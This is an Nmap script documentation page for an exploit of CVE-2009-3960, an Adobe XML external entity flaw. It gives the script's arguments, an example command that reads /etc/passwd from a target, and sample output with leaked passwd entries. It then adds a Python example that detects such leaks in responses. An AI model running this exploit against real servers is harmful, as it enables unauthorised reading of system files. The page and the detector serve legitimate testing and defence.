
File http-vuln-cve2009-3960

Script types: portrule
Categories: exploit, intrusive
Download: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse

User Summary

Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.

This vulnerability allows local files to be read remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.

For more information see:

Script Arguments

http-vuln-cve2009-3960.root

Points to the root path. Defaults to "/"

http-vuln-cve2009-3960.readfile

Target file to be read. Defaults to "/etc/passwd"

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

vulns.showall

See the documentation for the vulns library.

Example Usage

Command format

nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>

Script Output

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960: 
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_
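
A response-side check a defender could run over captured messagebroker replies, written as an added example (not part of the Nmap script or this page): it flags AMFX bodies whose string values carry passwd-style records like those in the output above. The function names, the three-line threshold and the sample bodies are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# One passwd(5) record: name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][\w.-]*:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")

# Constructed sample modelled on the script output shown above.
LEAKY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    '<object type="flex.messaging.messages.AcknowledgeMessage">'
    '<traits><string>timestamp</string><string>body</string></traits>'
    '<double>1.0</double><null/>'
    '<string>root:x:0:0:root:/root:/bin/bash\n'
    'bin:*:1:1:bin:/bin:/sbin/nologin\n'
    'daemon:*:2:2:daemon:/sbin:/sbin/nologin\n</string>'
    '</object></body></amfx>'
)
# Constructed benign acknowledgement for comparison.
CLEAN = (LEAKY[:LEAKY.index("<string>root")]
         + "<string>ok</string></object></body></amfx>")


def passwd_lines(text):
    """Return fragments of `text` that look like passwd(5) records."""
    parts = (p.strip() for p in re.split(r"[<>\r\n]", text))
    return [p for p in parts if PASSWD_LINE.match(p)]


def inspect_amfx_response(body, min_lines=3):
    """Return (leaked, hits) for one HTTP response body.

    <string> values are scanned when the body parses as XML; a body that
    does not parse (e.g. a truncated capture) is scanned as raw text.
    """
    try:
        texts = [el.text or "" for el in ET.fromstring(body).iter("string")]
    except ET.ParseError:
        texts = [body]
    hits = [ln for t in texts for ln in passwd_lines(t)]
    return len(hits) >= min_lines, hits


if __name__ == "__main__":
    for name, body in (("leaky", LEAKY), ("clean", CLEAN)):
        print(name, inspect_amfx_response(body))
```
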

Requires


Author: Hani Benhabiles

License: compiled by VER007 http://www.ver007.com